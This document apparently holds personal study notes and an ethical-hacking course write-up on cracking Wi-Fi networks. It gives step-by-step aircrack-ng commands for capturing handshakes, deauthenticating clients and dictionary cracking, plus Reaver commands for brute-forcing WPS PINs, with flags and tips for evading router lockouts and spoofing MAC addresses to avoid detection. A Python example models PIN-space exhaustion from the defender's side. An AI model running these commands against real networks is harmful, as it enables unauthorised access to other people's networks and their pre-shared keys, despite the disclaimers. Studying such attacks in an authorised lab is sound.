Failed To Retrieve A Mac Address For Interface Mon0



Disclaimer: This info is shared for educational purposes only. I don't take any responsibility if any person or organization uses it to intentionally harm anyone.

This is less a tutorial and more my personal notes from studying security.

Things you need: Kali Linux, Aircrack-ng suite (NO EXCEPTIONS)
1. Bring the interface down so it's not connected to any network
ifconfig wlan0 down

2. Start wlan0 in monitor mode; the result will be mon0, mon1… mon#
airmon-ng start wlan0

3. Change the MAC on the monitor interface (not needed, but pen testing can't be done without clearing out your own footprints)
ifconfig mon0 down
macchanger -r mon0 # this gives a random MAC address to the monitor interface
ifconfig mon0 up

4. Check that you got a new MAC address
ifconfig mon0

5. Dumping from specific channel
airodump-ng mon0 -c 11

6. Starting the packet dump and writing it to a file

airodump-ng -w H6762 --bssid BC:CA:B5:39:67:60 -c 11 --ivs mon0
-w fileName: name used for the .ivs files
--bssid: the AP's MAC address
-c: channel number
--ivs: only dump IVs (initialization vectors) so the dump file size is small
mon0: your interface which is monitoring

7. Check packet injection
aireplay-ng -9 -e HOME-6762 -a BC:CA:B5:39:67:60 mon0

8. Deauthing the client so it connects again and we get the handshake between client and AP
aireplay-ng --deauth 5 -a BC:00:B5:00:67:60 -c 84:00:A5:30:F0:00 mon0

--deauth: number of packets
-a Access point AKA Router
-c Client or Station

9. Starting the dictionary attack to crack the handshake that we got from the previous step
aircrack-ng H6562-02.ivs -w /usr/share/wordlists/rockyou.txt

Yup, if the password is in the text file, it will be cracked 100% of the time. There are bigger files that go up to 15 GB uncompressed.

Please keep in mind that brute force can take a lot of time. So in my opinion, it's not a practical approach for home users to crack a password with their home computer. No offense.

Cracking WPS security the Reaver way
wash -i mon0
reaver -i mon0 --channel 1 --essid SOME-2452 --bssid F8:EE:A5:WW:FF:50 -vv

A little description of WPS and why it's so much easier when it comes to brute force

Reaver

An 8 digit pin using 0-9 = 10 to the 8th possible combinations (100,000,000).

However, since the 8th digit isn't part of the pin (it is just a checksum of the other 7), the total is 10 to the 7th (10,000,000).

However, WPS presents the pin in two halves for verification. So if one half of 4 digits is correct, it will just work on the other half of 4.

Don't forget the second half has one space for a checksum, so really it's just 3 digits in the second half.

The correct total for WPS is 10 to the 4th + 10 to the 3rd = 11,000. So the first half has 10,000 possible combinations and the second half has just 1,000.
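
The arithmetic above, as an added example that is not part of the original notes: it checks the checksum claim by enumeration and models, from the access point owner's side, how long covering the 11,000-guess space takes at per-attempt times like those quoted in these notes. The function names and the lockout policies are assumptions made for illustration.

```python
# Added example: defender's model of the WPS PIN search space and exhaustion time.
# The lockout policies used below are hypothetical, not vendor defaults.

def wps_checksum(body7: int) -> int:
    """Checksum digit over the first 7 PIN digits (Wi-Fi Simple Configuration)."""
    accum = 0
    while body7:
        accum += 3 * (body7 % 10)
        body7 //= 10
        accum += body7 % 10
        body7 //= 10
    return (10 - accum % 10) % 10

def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN's last digit matches the checksum of the first 7."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])

def valid_second_half_count(first_half: str) -> int:
    """How many of the 10,000 second halves pass the checksum for this first half."""
    return sum(is_valid_pin(f"{first_half}{h:04d}") for h in range(10_000))

def worst_case_attempts(split_halves: bool = True) -> int:
    """Guesses needed to cover every PIN, with or without per-half confirmation."""
    return 10**4 + 10**3 if split_halves else 10**7

def exhaustion_seconds(sec_per_attempt, lock_after=None, lock_seconds=0,
                       split_halves=True) -> int:
    """Worst-case time to cover the space, including lockout pauses if configured."""
    attempts = worst_case_attempts(split_halves)
    lockouts = (attempts - 1) // lock_after if lock_after else 0
    return attempts * sec_per_attempt + lockouts * lock_seconds

if __name__ == "__main__":
    print("valid second halves for first half 1234:", valid_second_half_count("1234"))
    for label, kwargs in [
        ("old firmware, 3 s/attempt, no lockout", dict(sec_per_attempt=3)),
        ("updated firmware, 90 s/attempt", dict(sec_per_attempt=90)),
        ("3 s/attempt, 60 s lock every 3 failures",
         dict(sec_per_attempt=3, lock_after=3, lock_seconds=60)),
        ("3 s/attempt, 1 h lock every 10 failures",
         dict(sec_per_attempt=3, lock_after=10, lock_seconds=3600)),
        ("no half-confirmation, 3 s/attempt",
         dict(sec_per_attempt=3, split_halves=False)),
    ]:
        print(f"{label}: {exhaustion_seconds(**kwargs) / 3600:.1f} h")
```

The gap between the split and non-split rows is the design flaw itself. Lockout only stretches the 11,000-guess case, which is why disabling WPS is the durable fix.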

Short keys (--dh-small, -S) will speed it up. My lab gives me 22-90 secs a pin on updated firmware routers. 2-3 seconds on old firmware.

Also note that even though the router says locked or no WPS, hit it anyway (-L) to vet that, because my recent tests show they are unlocked yet flagging locked.

What I used last..

“reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3 # -r 2:199 # if you are getting locked out too much add that it may help”

-a Auto select some advanced features.

-S Use small Diffie-Hellman keys (reduces strain on the router & increases speed).

-N No nacks, just speeds things up a bit.

-E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.

-d The default delay period between pin attempts is 1 second.

-r Recurring delay. Sleep for y number of seconds every x pin attempts.

Disclaimer: This is for educational and personal use only. This was originally done as an assignment for SEC701 – Ethical Hacking. I do not condone potential illegal uses of this information. However it is perfectly legal to “hack” your own equipment or equipment you’re authorized to administer. If you use this for malicious purposes, it is not my fault.

Background

WPS is a security standard that allows users to connect to WPA/WPA2 networks more easily, through use of an 8 digit pin code. As a result this actually weakens the security of WPA/WPA2, as the pin can be brute forced, and once compromised it allows the hacker to access the router/access point and have it provide its own passphrase or PSK (pre-shared key). The tools used in this attack are as follows, all included in Kali Linux.

  • macchanger (for MAC spoofing, not directly connected to the attack)
  • airmon-ng
  • wash
  • reaver

The video used as a basis for this attack (and shown for demonstration in class) can be found here:

Part 1 – MAC Spoofing

While not essential to our hack, in order to simulate doing this for real we’re going to spoof our MAC Address to limit the potential for getting caught. To do this requires only a few steps. For demonstration purposes, show the current MAC address:

The first thing we do is bring the interface down and stop network manager, by issuing the following commands:

Now we generate a random MAC address using macchanger. There are a couple of different options here, either using -r which will generate a random MAC or -a which will generate a random MAC with the same manufacturer prefix (if it can determine the manufacturer). In my case, it couldn’t so the output is the same as using -r.

Finally bring the interface up, and note the MAC has changed (the previous step actually shows you the original MAC and the new MAC).

Part 2 – Hacking WPS

Hacking WPS was actually less work than hacking WEP, though it took a lot longer. The first thing we need to do is run airmon-ng without options to ensure our wireless interface is being detected properly.

Next issue the command again with the interface included to start monitoring.

Issue the wash command to scan for access points in the area.

The output should look something like the following.

Now we’re going to run reaver with the MAC address of the access point as an argument, which was obtained as a result of the command used in the previous step. This step can take anywhere from 4 to 20+ hours. In my case it took about 6 hours to successfully crack the WPS pin.

Once you have the pin, run reaver again providing it the pin as an argument and it will return the PSK fairly quickly.

Which resulted in the following output.

Conclusions

The attack method used to compromise WPA/WPA2 by way of hacking the WPS was in my opinion much easier than that used to hack WEP in a previous demonstration this semester. While WEP took about 30 minutes to crack, hacking WPS took approximately 6 hours. After some very brief research online I discovered that this process can take anywhere from 4 to 30 hours. You would think the length of time required to perform the hack would be somewhat of a deterrent, however once WPS has been compromised it opens up a permanent vulnerability (unless one disables WPS) as the same key can be used to repeat the process once the Administrator for the access point changes the pre-shared key. To further complicate matters the WPS key is hard coded for each router, and cannot be changed. Which leads us to another problem. Some access points don’t actually disable WPS even when you’ve disabled the ability in the device’s settings. This has been patched by many of the leading manufacturers, but it is up to the Administrator responsible for the access point to see if this is in fact an issue for their particular hardware.